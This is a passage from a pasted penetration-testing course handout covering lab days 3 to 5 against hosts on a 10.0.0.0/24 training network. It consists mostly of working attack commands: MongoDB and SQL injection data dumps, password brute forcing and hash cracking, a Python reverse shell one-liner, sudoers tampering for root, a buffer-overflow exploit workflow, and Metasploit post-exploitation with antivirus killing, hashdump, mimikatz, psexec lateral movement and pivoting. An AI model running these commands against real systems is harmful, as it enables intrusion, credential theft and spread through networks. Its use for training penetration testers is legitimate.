  1017. sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24
  1018.      infosecaddicts
  1019.  
  1020.  
  1021.  
  1022.  
  1023. Big Data is quite the buzzword in our industry and MongoDB is one of the more popular Big Data solutions on the market.
  1024. There are others like CouchDB, and Cassandra, but for right now let's play with MongoDB.
  1025.  
  1026. One of the huge red flags with MongoDB is that its default configuration it has no user authentication, and no permissions.
  1027.  
  1028.  
  1029.  
  1030. sudo apt install -y git python-setuptools
  1031.  
  1032. cd ~/toolz
  1033.  
  1034. mkdir arsenal
  1035.  
  1036. cd arsenal
  1037.  
  1038. git clone https://github.com/tcstool/nosqlmap.git
  1039.  
  1040. cd nosqlmap
  1041.  
  1042. sudo python setup.py install
  1043.      infosecaddicts
  1044.  
  1045. python nosqlmap.py
  1046. 1
  1047.  
  1048. 1                   (set options)
  1049.     10.0.0.8            (set target IP)
  1050.  
  1051.  
  1052. 7   <your IP>           (set attacker host ip)
  1053.  
  1054.  
  1055. x                   (back to main menu)
  1056.  
  1057. 2                   (DB access attack option)
  1058.  
  1059.  
  1060. 1                   (Get server info)
  1061.  
  1062.  
  1063. 2                   (Enumerate Databases/Collections/Users)
  1064.  
  1065.  
  1066. 3                   (Check for GridFS)
  1067.                     GridFS is a specification for storing and retrieving files that exceed the BSON-document size limit of 16MB. Instead of storing a file in a single document, GridFS divides a file into parts, or chunks [1], and stores each chunk as a separate document
  1068.  
  1069.  
  1070.  
  1071.  
  1072.  
  1073. Other attack options such as clone a database will require you to have a local copy of MongoDB installed, and the Metasploit attack is for too old of a version ( < 2.2.4 ).
  1074.  
  1075.  
  1076.  
  1077.  
  1078. ********************************** Begin Day 3 Homework Part 1 **********************************
  1079. NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
  1080.  
  1081. You must take screenshots of you performing all of the scanning tasks that we have done so far today
  1082.  
  1083. You must create a MS WORD document titled 'FirstName-LastName-Pentester-CyberWar-Day3.docx' (ex: Joseph-McCray-CyberWar-Day3.docx).
  1084.  
  1085. You must spell you name EXACTLY as you want it spelled on your class certificate.
  1086.  
  1087. IMPORTANT NOTE:
  1088. Your homework must be submitted via email to both (joe@strategicsec.com) by Sunday May 21st at midnight EST.
  1089.  
  1090. ********************************** End Day 3 Homework Part 1 **********************************
  1091.  
  1092.  
  1093.  
  1094. ##########
  1095. # Day 4: #
  1096. ##########
  1097.  
  1098.  
  1099.  
  1100. ######################
  1101. # Attacking 10.0.0.7 #
  1102. ######################
  1103.  
  1104. Step 1: Nmap Scan
  1105. sudo nmap -Pn -sV -T 5 10.0.0.7
  1106.  
  1107.  
  1108. Step 2: Open a browswer
  1109. Point your browser to http://10.0.0.7/
  1110.  
  1111.  
  1112. Step 3: Download the picture in the website:
  1113. wget http://10.0.0.7/main.gif
  1114. exiftool main.gif
  1115.  
  1116.  
  1117. Step 4: What's the password
  1118.  
  1119. Point your browser to http://10.0.0.7/kzMb5nVYJw/ and then view source.
  1120.  
  1121. From there you'll see that it tells you that the password is a simple one.
  1122.  
  1123.  
  1124. cd ~/toolz/
  1125. echo dbo >> list.txt
  1126. echo sa >> list.txt
  1127. echo admin >> list.txt
  1128. echo root >> list.txt
  1129. echo password >> list.txt
  1130. echo pass >> list.txt
  1131. echo hello >> list.txt
  1132. echo goodbye >> list.txt
  1133. echo test >> list.txt
  1134. echo admin >> list.txt
  1135. echo elite >> list.txt
  1136. echo db >> list.txt
  1137. echo god >> list.txt
  1138. echo 123 >> list.txt
  1139. echo letmein >> list.txt
  1140. echo omega >> list.txt
  1141.  
  1142.  
  1143.  
  1144. hydra -l none -P list.txt 10.0.0.7 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key"
  1145.  
  1146.  
  1147. cd ~/toolz/sqlmap-dev/
  1148.  
  1149. python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a --dbs
  1150.  
  1151.  
  1152. python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D mysql --tables
  1153.  
  1154. python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D mysql -T user --columns
  1155.  
  1156. python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D mysql -T user -C User,Password --dump
  1157.  
  1158. python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D phpmyadmin --tables
  1159.  
  1160. python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D seth
  1161.  
  1162. python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D seth -T users --columns
  1163.  
  1164. python sqlmap.py -u http://10.0.0.7/kzMb5nVYJw/420search.php?usrtosearch=a -D seth -T users -C id,user,pass --dump
  1165.  
  1166. cat /home/infosecaddicts/.sqlmap/output/10.0.0.7/dump/seth/users.csv
  1167.  
  1168. cd toolz/
  1169.  
  1170.  
  1171.  
  1172. We can look this password hash up on Crackstation.net https://crackstation.net/ - ok that didn't work. Maybe it's in Base64. Let's try to decode it.
  1173.  
  1174.  
  1175.  
  1176. Decoding the base64 value gives us the actual hash. (Note I add a “=” to the string so that base64 can properly decode it)
  1177.  
  1178. echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d
  1179.  
  1180. echo "c6d6bd7ebf806f43c76acc3681703b81" > hash.txt
  1181.  
  1182.  
  1183.  
  1184.  
  1185. We can look up this password hash "c6d6bd7ebf806f43c76acc3681703b81" on Crackstation.net https://crackstation.net/
  1186.  
  1187. Ok - that worked. The password is "omega", but if you want to do it with hashcat we can do the following steps:
  1188.  
  1189.  
  1190. sudo apt install -y nvidia-opencl-icd-340 libxnvctrl-dev nvidia-opencl-dev libgmp3-dev libgmp10-doc opencl-headers
  1191.  
  1192. wget http://registrationcenter-download.intel.com/akdlm/irc_nas/9019/opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
  1193.  
  1194. tar -zxvf opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
  1195.  
  1196. sudo ./opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25/install.sh
  1197.  
  1198. hashcat --benchmark
  1199.  
  1200.  
  1201. hashcat -m 0 -a 0 hash.txt ~/toolz/list.txt
  1202.  
  1203.  
  1204.  
  1205.  
  1206. Ok, now let's log into the machine.
  1207.  
  1208.  
  1209. ssh 10.0.0.7 -p 777 -lramses
  1210.  
  1211. cat /etc/issue
  1212.  
  1213. find / -user root -perm -4000 -print 2>/dev/null | grep -v bin | grep -v usr
  1214.  
  1215. cd /var/www/backup/
  1216.  
  1217. ls -l procwatch
  1218.  
  1219.  
  1220.  
  1221. Figure out how to root this box!!!!!!!!!!!!!!!!
  1222.  
  1223. whoami
  1224. ln -s /bin/ls ps
  1225. export PATH=`pwd`:${PATH}
  1226. ./procwatch
  1227. ln -snf /bin/sh ps
  1228. ./procwatch
  1229. whoami
  1230. cat /root/proof.txt
  1231.  
  1232.  
  1233. .......hahahahah rooted and polluted!!!!!!!!!
  1234.  
  1235. So now let's go attack .14 with this box.
  1236.  
  1237. nc -l -v -p 443
  1238.  
  1239.  
  1240. ...from the webshell on 10.0.0.14 (http://10.0.0.14/test/cmd.php)
  1241.  
  1242. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.7",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  1243.  
  1244.  
  1245. This will give you a user level shell on 10.0.0.14
  1246.  
  1247. dpkg -l chkrootkit
  1248. ls -al /etc/sudoers
  1249. echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
  1250.  
  1251.  
  1252. ....wait for it.....wait for it (a few hours possibly since it is cron.daily...)
  1253. sudo su
  1254.  
  1255. ....now you are root
  1256.  
  1257.  
  1258. ####################################
  1259. # Finally, let's exploit something #
  1260. ####################################
  1261.  
  1262. #####################################
  1263. # Quick Stack Based Buffer Overflow #
  1264. #####################################
  1265.  
  1266. - You can download everything you need for this exercise (except netcat) from the link below
  1267. https://infosecaddictsfiles.blob.core.windows.net/files/ExploitLab.zip
  1268.  
  1269. - Extract this zip file to your Desktop
  1270.  
  1271. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  1272.  
  1273. - Open a new command prompt and type:
  1274. nc localhost 9999
  1275.  
  1276. - In the new command prompt window where you ran nc type:
  1277. HELP
  1278.  
  1279. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
  1280. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  1281.  
  1282. - Now double-click on 1-simplefuzzer.py
  1283. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  1284.  
  1285.  
  1286. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  1287.  
  1288. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  1289.  
  1290. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  1291.  
  1292. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  1293.  
  1294. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  1295.  
  1296. - Calculate the distance to EIP by running script 3-3000chars.py
  1297. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  1298.  
  1299. 4-count-chars-to-EIP.py
  1300. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  1301. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  1302.  
  1303. 5-2006char-eip-check.py
  1304. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  1305.  
  1306. 6-jmp-esp.py
  1307. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  1308.  
  1309. 7-first-exploit
  1310. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  1311.  
  1312. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  1313.  
  1314.  
  1315. ------------------------------
  1316.  
  1317. cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
  1318.  
  1319. vi vulnserv.rb    (paste the code into this file)
  1320.  
  1321.  
  1322.  
  1323. cd ~/toolz/metasploit
  1324.  
  1325. ./msfconsole
  1326.  
  1327.  
  1328.  
  1329. use exploit/windows/misc/vulnserv
  1330. set PAYLOAD windows/meterpreter/bind_tcp
  1331. set RHOST 10.0.0.10
  1332. set RPORT 9999
  1333. exploit
  1334.  
  1335.  
  1336.  
  1337.  
  1338.  
  1339.  
  1340. ********************************** Figure out who and where you are **********************************
  1341.  
  1342. meterpreter> sysinfo
  1343.  
  1344.  
  1345. meterpreter> getuid
  1346.  
  1347.  
  1348. meterpreter> ipconfig
  1349.  
  1350.  
  1351. meterpreter> run post/windows/gather/checkvm
  1352.  
  1353.  
  1354. meterpreter> run get_local_subnets
  1355.  
  1356.  
  1357.  
  1358. ********************************** Escalate privileges and get hashes **********************************
  1359.  
  1360.  
  1361. meterpreter> use priv
  1362.  
  1363.  
  1364.  
  1365. meterpreter > getsystem
  1366. ...got system (via technique 1).
  1367.  
  1368. meterpreter > getuid
  1369. Server username: NT AUTHORITY\SYSTEM
  1370.  
  1371. --------------------------------------------------------
  1372.  
  1373. meterpreter> run killav
  1374.  
  1375. meterpreter> run post/windows/gather/hashdump
  1376.    
  1377.     Got the following admin hash:
  1378.     Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::
  1379.  
  1380. meterpreter> run post/windows/gather/credentials/credential_collector
  1381.  
  1382. meterpreter > load mimikatz
  1383.  
  1384. meterpreter > kerberos
  1385.  
  1386.     This should give me the administrative password:
  1387.     )K5?Jocb(Yx
  1388.  
  1389.  
  1390. ********************************** Enumerate the host you are on **********************************
  1391.  
  1392. meterpreter> run winenum
  1393.  
  1394. meterpreter > run post/windows/gather/enum_applications
  1395.  
  1396. meterpreter > run post/windows/gather/enum_logged_on_users
  1397.  
  1398. meterpreter > run post/windows/gather/usb_history
  1399.  
  1400. meterpreter > run post/windows/gather/enum_shares
  1401.  
  1402. meterpreter > run post/windows/gather/enum_snmp
  1403.  
  1404. meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
  1405.  
  1406.  
  1407. ********************************** Get out of Meterpreter **********************************
  1408.  
  1409. meterpreter> background
  1410.  
  1411. msf exploit(savant_31_overflow) > back
  1412.  
  1413. msf>
  1414.  
  1415.  
  1416.  
  1417.  
  1418. ********************************** Lateral Movement *******************************
  1419.  
  1420.  
  1421. Now we can run the PSEXEC exploit.
  1422.  
  1423. -- Option 1:
  1424. use exploit/windows/smb/psexec
  1425.  
  1426. set SMBUser Administrator
  1427.  
  1428. set SMBPass )K5?Jocb(Yx
  1429.  
  1430. set RHOST 10.0.0.15
  1431.  
  1432. set payload windows/meterpreter/bind_tcp
  1433.  
  1434. set LPORT 2345
  1435.  
  1436. exploit
  1437.  
  1438. ********************************** Get out of Meterpreter **********************************
  1439.  
  1440. meterpreter> background
  1441.  
  1442. msf exploit(psexec) >back
  1443.  
  1444. msf>
  1445.  
  1446. **********************************  
  1447.  
  1448. -- Option 2:
  1449. use exploit/windows/smb/psexec
  1450.  
  1451. set SMBUser Administrator
  1452.  
  1453. set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363
  1454.  
  1455. set payload windows/meterpreter/bind_tcp
  1456.  
  1457. set RHOST 10.0.0.15                      
  1458.  
  1459. set LPORT 5678
  1460.  
  1461. exploit
  1462.  
  1463.  
  1464.  
  1465. ********************************** Set up your Pivot **********************************
  1466.  
  1467. meterpreter > background
  1468.                                                         <-- background the session
  1469.         You want to get back to this prompt:
  1470.         msf exploit(handler) > back                     <--- you need to get to main msf> prompt
  1471.  
  1472.  
  1473.  
  1474.         sessions -l                                     <--find a session you want to pivot through (note the IP and session number)
  1475.        
  1476.         Now set up Pivot with a route add
  1477.         ---------------------------------
  1478.  
  1479. route print                                             <--- should be blank
  1480.  
  1481. route add 10.0.0.15 255.255.255.0 1                       <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter)
  1482.  
  1483.  
  1484. route print                                             <----- verify new route
  1485.  
  1486. ******************************Scan through your Pivot ******************************
  1487.  
  1488. use auxiliary/scanner/portscan/tcp                      <-- Run aux modules through your pivot
  1489.  
  1490. set THREADS 10
  1491.  
  1492. set RHOSTS 10.0.0.0/24             <-- Keep changing this IP and re-running the scan until you find something you want to attack
  1493.  
  1494. set PORTS 445
  1495.  
  1496. run
  1497.  
  1498.  
  1499. ####################################
  1500. # Socks Tunneling with Proxychains #
  1501. ####################################
  1502. --- Open a duplicate putty session to your Ubuntu host
  1503.  
  1504. sudo apt install -y proxychains
  1505.     infosecaddicts
  1506.  
  1507. sudo vi /etc/proxychains.conf                           <--- Make sure that last line of the file is: socks4  127.0.0.1 1080
  1508.      infosecaddicts
  1509.  
  1510.         Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
  1511.         socks4  127.0.0.1 1080
  1512.  
  1513. ***************************Set up a Socks Proxy through your Pivot *************************
  1514.  
  1515.  
  1516. use auxiliary/server/socks4a
  1517.  
  1518. set SRVHOST 127.0.0.1
  1519.  
  1520. set SRVPORT 1080
  1521.  
  1522. run
  1523.  
  1524.         --- Go back to your other putty session with the meterpreter shell
  1525. cd ~
  1526.  
  1527. proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 10.0.0.0/24          <--- This is going to be really slow
  1528.  
  1529. proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24           <--- This is going to be really slow
  1530.  
  1531.  
  1532.         ---close the duplicate putty session to your Ubuntu host
  1533.  
  1534.  
  1535.  
  1536.  
  1537. ********************************** Begin Day 4 Homework Part 1 **********************************
  1538. NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
  1539.  
  1540. You must take screenshots of you performing all of the scanning tasks that we have done so far today
  1541.  
  1542. You must create a MS WORD document titled 'FirstName-LastName-Pentester-CyberWar-Day4.docx' (ex: Joseph-McCray-CyberWar-Day3.docx).
  1543.  
  1544. You must spell you name EXACTLY as you want it spelled on your class certificate.
  1545.  
  1546. IMPORTANT NOTE:
  1547. Your homework must be submitted via email to both (joe@strategicsec.com) by Sunday May 21st at midnight EST.
  1548.  
  1549. ********************************** End Day 4 Homework Part 1 **********************************
  1550.  
  1551.  
  1552. ************************ Class Challenge ************************
  1553.  
  1554. Let's see how you do with someone else's vulnerable website. Your 1st target is: http://zero.webappsecurity.com
  1555.  
  1556. Here are some sample web app penetration test reports from other companies that you can look at:
  1557. https://infosecaddictsfiles.blob.core.windows.net/files/WebAppSampleReports.zip
  1558.  
  1559. I want you to perform a penetration test against http://zero.webappsecurity.com and document the engagement as if it were a real project.
  1560.  
  1561.  
  1562.  
  1563.  
  1564.  
  1565. #########
  1566. # Day 5 #
  1567. #########
  1568.  
  1569. Today you finally get the chance to take a step into the world of penetration testing.
  1570.  
  1571.  
  1572. Day 5 Task 1
  1573. We'll start by having your do a job interview for the position of junior penetration tester. Here are the questions:
  1574. https://goo.gl/forms/l2cMNg1F50kLQsHG2
  1575.  
  1576.  
  1577.  
  1578. Day 5 Task 2
  1579. Create an OSINT report on the retail company TARGET. You'll all work together on this and put together as thorough of a report as possible.
  1580. You'll each be given access to the Googele Drive where all of the resources to complete this task are located.
  1581.  
  1582.  
  1583.  
  1584.  
  1585. Day 5 Task 3
  1586. Use nmap to map the target network (10.0.0.0/24).
  1587.  
  1588. Task 3a) Identify the number of reachable hosts.
  1589.  
  1590. Task 3b) Identify the number of open ports per hosts.
  1591.  
  1592. Task 3c) Identify the software versions of each application running on each exposed port on each host in the environment.
  1593.  
  1594. Task 3d) Identify the vulnerable services on each host in the target network along with their exploit-db.com ID number
  1595.  
  1596. Task 3e) Put all of this information into a spreadsheet in the Google Drive folder
  1597.  
  1598.  
  1599.  
  1600.  
  1601. Day 5 Task 4
  1602. Use DirBuster to go afer at least 3 servers in the target network (10.0.0.0/24).
  1603.  
  1604. Reference:
  1605. http://securityxploded.com/bruteforcing-filenames-on-webservers-using-dirbuster.php
  1606.  
  1607.  
  1608.  
  1609.  
  1610. Day 5 Task 5
  1611. Populate the findings spreadsheet with as much detail as possible
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top